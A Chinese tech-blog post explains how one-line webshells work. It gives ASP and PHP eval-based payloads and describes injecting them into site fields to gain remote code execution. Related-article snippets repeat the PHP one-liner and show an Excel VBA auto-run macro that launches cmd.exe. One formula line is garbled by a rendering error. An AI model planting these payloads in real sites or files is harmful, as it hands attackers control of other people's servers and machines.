一句话木马原理

最新推荐文章于 2023-04-14 18:37:37 发布
最新推荐文章于 2023-04-14 18:37:37 发布
阅读量1.4w 收藏 19
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43915842/article/details/89426082
版权

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
<%execute request(“value”)%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值
<%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)
当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了。)
这就被称为一句话木马,它是基于B/S结构的。
在php语言中我们可以通过GET 、POST 、COOKIE 这三种方式向一个网站提交数据,一句话木马用
KaTeX parse error: Double superscript at position 8: _GET[' '̲]、_POST[’ ‘]、$_COOKIE[’ '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。
就像是这样:执行命令的函数(接收的数据)
在这里插入图片描述

其中eval就是执行命令的函数,$_POST[‘a’]就是接收的数据。eval函数把接收的数据当作php代码来执行。这样我们就能够让插了一句话木马的网站执行我们传递过去的任意php语句。这便是一句话木马的强大之处。

。北冥有鱼
关注
  • 5
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
asp防止上传图片木马原理解析
10-23
有时候通过程序上传木马,一般都是伪装成图片,下面是asp下检测图片木马的代码,需要的朋友可以参考下。
php代码执行函数解析
xujunhui222的博客
02-11 3361
** php代码执行函数解析 ** ​一、代码执行漏洞原理: 用户输入的数据被当做后端代码进行执行 <?php @eval($_REQUEST[8])?>//其实一句话木马的本质就是一个代码执行漏洞。用户输入的数据被当做代码进行执行。 这里提一下RCE(remote command/code execute)远程命令或者代码执行。现在只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE 在PHP存在诸多
javascript eval()的注意事项
mogra的专栏
06-29 596
Javascript是一门解释型语言,与其它同类型语言一样,他拥有功能强大的eval()函数。eval()能把字符串当作普通的javascript代码一样执行。它非常强大且易用,以至于被用在了许多不该使用的地方,让代码执行变慢以及难以维护。一般来讲,如果你使用了eval,你的设计上可能就有问题。 常见错误 这是一个典型的误用eval()的例子。你有一个名为foo的javascrip
2017-01-27-一句话木马原理详解
Be Smart
03-17 4531
layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者:愤怒的小辣椒 链接:https://www.zhihu.com/question/269213687/answer/1088999932 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 首先理解,eval()是把里面的内容按照php代码去执行 菜刀通过你的一句话木马去进行http请求,然后用经过base64编.
一句话木马
qq_53065516的博客
03-27 2万+
一:一句话木马:标准代码形式:<?php @eval($_POST[‘attack’]) ?> eval()函数表示括号内的语句字符串什么的全都当做代码执行POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php的一句话木马:<?php@eval(_POST[‘attack’]表示从页面中获得attack这个参数值。 常见形式: php的一句话木马: <?php @eval(P​OST[‘attack’]表示从页面中获得attack这个参数值。常见形式:p
一句话木马的工作原理
liwei8703的专栏
11-19 7万+
<br />一句话木马的工作原理一句话木马分析服务端与客户端。<br />"一句话木马"服务端(是用于本地的html提交脚本木马文件)<br />就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改<br />"一句话木马"客户端(远程服务器上被插入一句话的asp可执行文件)<br />用来向服务端
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 29万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
一句话木马原理浅析
whoim_i的博客
02-26 4389
        ~~~~~~~~        因为想要面对一个新的开始,一个人必须有梦想、有希望、有对未来的憧憬。如果没有这些,就不叫新的开始,而叫逃亡。 ​​​​      &nbsp...
你真的了解一句话木马吗?
Elite的博客
04-14 1万+
一句话木马是大多网安人在初步学习中,遇到的一种简单的木马文件,但是你真的了解它吗?
一句话木马原理(方法和适用环境)
gl620321的博客
04-19 6324
一.一句话木马原理 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码: <%execute request(“value”)%> 其中value是值,所以你可以更改自己的值,前面的request就是获取这个值 <%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用) 当知道了数据库的URL,就可以利用本地一张...
一句话使用方法
02-17
如何使用ASP一句话木马呢?俗话说的好:“害人之心不可有,防人之心不可无!”下面就由惟零广告为大家简单介绍一句话木马的使用方法,让您了解其工作原理,确保您的程序万无一失!
ASP下检测图片木马的函数代码
01-02
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变)...
计算机病毒与防护:文件上传漏洞原理.ppt
06-10
文件上传漏洞测试思路 文件上传漏洞---无任何上传限制 文件上传漏洞利用 文件上传漏洞---无任何上传限制 1)上传一句话木马 eval.php 文件上传漏洞利用 文件上传漏洞---无任何上传限制 2)构造木马连接 3
28.文件上传漏洞和Caidao入门及防御原理(一)1
08-04
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。一.文件上传漏洞
Suno AI Download 免费下载Suno AI 音乐
04-18
网站描述:Sunoaidownload——从分享链接中轻松下载Suno AI生成的歌曲文件 内容概要: 这是一个专门提供Suno AI生成的歌曲文件下载服务的网站,用户可以通过分享链接轻松获取所需文件。本网站提供高质量、多样化的音乐资源,满足不同用户的需求。 适用人群: 该网站适用于所有热爱音乐、需要音乐素材的用户,特别适合音乐创作者、音乐爱好者、学生、教师等人群使用。 使用场景: 该网站的使用场景非常广泛,具体包括以下几个方面: 1. 音乐创作:音乐创作者可以使用本网站提供的歌曲文件进行创作,丰富作品内容,提升作品质量。 2. 音乐学习:学生和教师可以使用本网站的歌曲文件进行音乐学习,提高音乐素养和技能。 3. 娱乐休闲:普通用户可以使用本网站的歌曲文件进行放松、娱乐和休闲,享受音乐带来的愉悦。 其他说明: 本网站提供高速、稳定的下载服务,确保用户能够快速获取所需文件。同时,我们注重版权保护,只提供合法授权的歌曲文件,避免侵犯他人权益。为了更好地服务用户,我们不断优化网站功能和用户体验,欢迎提出宝贵意见和建议。此外,为了保障用户数据安全,我们采取了先进的安全措施。
基于Python的Django配置Celery设计源码
04-18
本项目是基于Python的Django配置Celery设计源码,包含20个文件,其中主要包含17个py源代码文件。系统采用了Python编程语言,实现了Django配置Celery的功能。项目结构清晰,代码可读性强,易于理解和维护。
物联网嵌入式ESP32开发例程05-FreeRTOS操作系统之时间片调度C程序代码.rar
04-18
1、嵌入式物联网ESP32项目实战开发。例程经过精心编写,简单好用。 2、代码使用Visual Studio Code + ESP-IDF开发,C语言编程。例程在ESP32-S3上运行。若在其他型号上运行,请自行调整。 3、如果接入其他传感器,请查看发布的其他资料。 4、ESP32与模块的接线,在代码当中均有定义,请自行对照。 5、若硬件差异,请根据自身情况适当调整代码,程序仅供参考。 6、代码有注释说明,请耐心阅读。 7、技术v:349014857;
华为IPMS流程优化策略glz.pptx
04-18
华为IPMS流程优化策略glz.pptx
文字转合成语音软件工具
最新发布
04-18
文字转语音软件,两款,都非常好用,亲测有效,免费声音足够使用,需要的兄弟自行下载
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值